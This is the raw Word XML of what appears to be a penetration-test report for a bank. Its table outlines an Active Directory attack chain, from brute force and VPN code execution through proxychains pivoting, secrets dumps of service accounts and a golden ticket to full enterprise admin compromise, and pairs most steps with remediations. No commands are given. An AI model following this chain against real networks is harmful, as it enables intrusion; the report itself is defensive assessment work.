          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="2AD67FA8" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D045F35" w14:textId="12A58F2F" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC55668" w14:textId="15E49F18" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Brute Force Various Accounts </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C90D20A" w14:textId="323260E8" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>Enforce Stronger Password Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="18A3681C" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01EC2873" w14:textId="7472B8E4" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD88424" w14:textId="665B117A" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>Remote Code Execution on VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C52340C" w14:textId="3F9D7099" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Steralise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> all input from users or remove custom filename functionality &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>valudation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="6A73DE70" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDDB30B" w14:textId="702BF338" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="072A81AB" w14:textId="56A8EC7A" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Proxychains</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to access internal network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04BD3A57" w14:textId="553B49F2" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Firewall Upgrades (Limit it to ports absolutely </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nessarcery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="5524083A" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A296FC9" w14:textId="611E96DD" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B270F3" w14:textId="45A83F62" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SecretsDump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> under </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Laura.Wood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Account – Reveals </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcScanning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> hash (Easily Cracked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A3E8BA" w14:textId="7775E15E" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Change </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcScanning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Password &amp; Stronger policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="34174300" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625C7F0C" w14:textId="6D8E8F4C" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1182D15E" w14:textId="47B56EEA" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SecretsDump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> under </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcScanning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, reveals </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcBackups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A6CD1A" w14:textId="636CEED4" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Upgrade </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcBackups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> password (Security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="3866EF10" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7227B2" w14:textId="111C4FD9" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6569C98E" w14:textId="11497D5C" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Secrets dump under </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>svcBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> gives domain admin hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26662A06" w14:textId="77777777" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="1456A835" w14:textId="77777777" w:rsidTr="00BE0BDD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F9E44D" w14:textId="19FFA467" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B8387C" w14:textId="55EEE7A5" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1">
            <w:r>
              <w:t xml:space="preserve">Golden Ticket Attack </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E5BD712" w14:textId="77777777" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00AB77C1"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE0BDD" w14:paraId="1BD01D45" w14:textId="77777777" w:rsidTr="005E33E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4699F81C" w14:textId="06F90DE2" w:rsidR="00BE0BDD" w:rsidRPr="00BE0BDD" w:rsidRDefault="00BE0BDD" w:rsidP="00BE0BD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ENTERPRISE ADMIN COMPROMISED. FULL ACCESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FD667D1" w14:textId="77777777" w:rsidR="00AB77C1" w:rsidRPr="00AB77C1" w:rsidRDefault="00AB77C1" w:rsidP="00AB77C1"/>
    <w:sectPr w:rsidR="00AB77C1" w:rsidRPr="00AB77C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0AD8" w14:textId="77777777" w:rsidR="00C72E94" w:rsidRDefault="00C72E94" w:rsidP="0082228B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="344B6C7A" w14:textId="77777777" w:rsidR="00C72E94" w:rsidRDefault="00C72E94" w:rsidP="0082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7355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91D1355" w14:textId="77777777" w:rsidR="0082228B" w:rsidRDefault="0082228B" w:rsidP="0082228B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D620A7C" w14:textId="77777777" w:rsidR="0082228B" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:pStyle w:val="Footer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Business Confidential</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015D346F" w14:textId="730E50DE" w:rsidR="0082228B" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:pStyle w:val="Footer"/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Trimento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Reserve Bank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647A" w14:textId="77777777" w:rsidR="00C72E94" w:rsidRDefault="00C72E94" w:rsidP="0082228B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A2B5939" w14:textId="77777777" w:rsidR="00C72E94" w:rsidRDefault="00C72E94" w:rsidP="0082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A0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A350AB2C"/>
    <w:lvl w:ilvl="0" w:tplc="995275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5077"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72C67532"/>
    <w:lvl w:ilvl="0" w:tplc="5A92030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4AA401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04AED3D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DD9E7EB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8E6581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B0AA09C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25A467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B4FA5C8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8716E11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098137247">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="179471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8B"/>
    <w:rsid w:val="003E6054"/>
    <w:rsid w:val="005F69E5"/>
    <w:rsid w:val="006B181A"/>
    <w:rsid w:val="0082228B"/>
    <w:rsid w:val="00A04586"/>
    <w:rsid w:val="00AB77C1"/>
    <w:rsid w:val="00BE0BDD"/>
    <w:rsid w:val="00C263C5"/>
    <w:rsid w:val="00C7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152C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD4DF182-C66E-45D1-A092-F8D2A5EB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8B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0082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8B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008222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228B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2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2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28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04586"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book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4586"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book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04586"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="960" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book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458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4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04586"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="62"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book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045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gconnor@proton.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634E-34F9-4D7C-B120-9F5B7AEC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PESTER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>CONNOR PESTER</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-01T11:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-01T13:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>